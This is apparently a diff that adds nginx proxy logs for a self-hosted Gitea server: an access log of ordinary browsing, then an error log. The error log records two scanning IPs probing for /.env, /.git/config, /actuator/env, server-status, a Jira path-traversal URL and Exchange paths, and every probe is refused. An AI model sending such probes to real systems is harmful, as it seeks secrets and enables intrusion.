[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3"
|
||||||
|
[15/Feb/2026:02:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11445] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3"
|
||||||
|
[15/Feb/2026:02:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11445] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11440] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 3036] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 4595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11440] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11440] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 18426] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
90
npm/data/logs/proxy-host-4_error.log
Normal file
90
npm/data/logs/proxy-host-4_error.log
Normal file
@@ -0,0 +1,90 @@
|
|||||||
|
2026/02/15 01:52:09 [error] 428#428: *3696 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "http://git.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:52:12 [warn] 428#428: *3700 using uninitialized "server" variable while logging request, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "LEAKIX"
|
||||||
|
2026/02/15 01:52:12 [error] 430#430: *3702 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:13 [error] 431#431: *3704 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:13 [error] 429#429: *3706 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /server HTTP/1.1", upstream: "http://192.168.0.250:3000/server", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:14 [error] 433#433: *3708 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /server HTTP/1.1", upstream: "http://192.168.0.250:3000/server", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:14 [error] 432#432: *3710 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /server-status HTTP/1.1", upstream: "http://192.168.0.250:3000/server-status", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:15 [error] 434#434: *3712 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /server-status HTTP/1.1", upstream: "http://192.168.0.250:3000/server-status", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:16 [error] 431#431: *3716 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /about HTTP/1.1", upstream: "http://192.168.0.250:3000/about", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:17 [error] 435#435: *3718 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /about HTTP/1.1", upstream: "http://192.168.0.250:3000/about", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:17 [error] 433#433: *3720 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /login.action HTTP/1.1", upstream: "http://192.168.0.250:3000/login.action", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:18 [error] 428#428: *3724 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /login.action HTTP/1.1", upstream: "http://192.168.0.250:3000/login.action", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:18 [error] 434#434: *3726 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /v2/_catalog HTTP/1.1", upstream: "http://192.168.0.250:3000/v2/_catalog", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:19 [error] 428#428: *3728 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /v2/_catalog HTTP/1.1", upstream: "http://192.168.0.250:3000/v2/_catalog", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:19 [error] 428#428: *3731 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.DS_Store HTTP/1.1", upstream: "http://192.168.0.250:3000/.DS_Store", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:19 [error] 435#435: *3730 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.DS_Store HTTP/1.1", upstream: "http://192.168.0.250:3000/.DS_Store", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:20 [error] 428#428: *3734 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.env HTTP/1.1", upstream: "http://192.168.0.250:3000/.env", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:20 [error] 428#428: *3736 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.env HTTP/1.1", upstream: "http://192.168.0.250:3000/.env", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:22 [error] 428#428: *3739 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", upstream: "http://192.168.0.250:3000/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:22 [error] 428#428: *3738 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", upstream: "http://192.168.0.250:3000/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:24 [error] 428#428: *3743 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.git/config HTTP/1.1", upstream: "http://192.168.0.250:3000/.git/config", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:24 [error] 428#428: *3742 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.git/config HTTP/1.1", upstream: "http://192.168.0.250:3000/.git/config", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:25 [error] 428#428: *3747 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /graphql HTTP/1.1", upstream: "http://192.168.0.250:3000/graphql", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:25 [error] 428#428: *3746 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /graphql HTTP/1.1", upstream: "http://192.168.0.250:3000/graphql", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:25 [error] 428#428: *3750 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /api HTTP/1.1", upstream: "http://192.168.0.250:3000/api", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:25 [error] 428#428: *3752 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /api/graphql HTTP/1.1", upstream: "http://192.168.0.250:3000/api/graphql", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:25 [error] 428#428: *3755 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /graphql/api HTTP/1.1", upstream: "http://192.168.0.250:3000/graphql/api", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:25 [error] 428#428: *3754 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /api HTTP/1.1", upstream: "http://192.168.0.250:3000/api", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:25 [error] 428#428: *3758 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /api/gql HTTP/1.1", upstream: "http://192.168.0.250:3000/api/gql", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:26 [error] 428#428: *3761 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", upstream: "http://192.168.0.250:3000/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:26 [error] 428#428: *3760 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /api/graphql HTTP/1.1", upstream: "http://192.168.0.250:3000/api/graphql", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:27 [error] 428#428: *3764 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /graphql/api HTTP/1.1", upstream: "http://192.168.0.250:3000/graphql/api", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:27 [error] 428#428: *3766 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /config.json HTTP/1.1", upstream: "http://192.168.0.250:3000/config.json", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:27 [error] 428#428: *3768 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /api/gql HTTP/1.1", upstream: "http://192.168.0.250:3000/api/gql", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:28 [error] 428#428: *3770 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", upstream: "http://192.168.0.250:3000/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:29 [error] 428#428: *3773 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /telescope/requests HTTP/1.1", upstream: "http://192.168.0.250:3000/telescope/requests", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:29 [error] 428#428: *3772 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /config.json HTTP/1.1", upstream: "http://192.168.0.250:3000/config.json", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:29 [error] 428#428: *3776 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /info.php HTTP/1.1", upstream: "http://192.168.0.250:3000/info.php", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:30 [error] 428#428: *3778 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.well-known/security.txt HTTP/1.1", upstream: "http://192.168.0.250:3000/.well-known/security.txt", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:31 [error] 428#428: *3782 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /telescope/requests HTTP/1.1", upstream: "http://192.168.0.250:3000/telescope/requests", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:31 [error] 430#430: *3785 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /actuator/env HTTP/1.1", upstream: "http://192.168.0.250:3000/actuator/env", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:31 [error] 428#428: *3780 connect() failed (111: Connection refused) while connecting to upstream, client: 95.215.39.14, server: git.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:31 [error] 428#428: *3787 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /info.php HTTP/1.1", upstream: "http://192.168.0.250:3000/info.php", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:32 [error] 428#428: *3780 connect() failed (111: Connection refused) while connecting to upstream, client: 95.215.39.14, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:52:32 [error] 428#428: *3791 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.well-known/security.txt HTTP/1.1", upstream: "http://192.168.0.250:3000/.well-known/security.txt", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:33 [error] 430#430: *3793 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger-ui.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger-ui.html", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:33 [error] 428#428: *3795 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /actuator/env HTTP/1.1", upstream: "http://192.168.0.250:3000/actuator/env", host: "git.hanmocnn.co.kr"
|
||||||
|
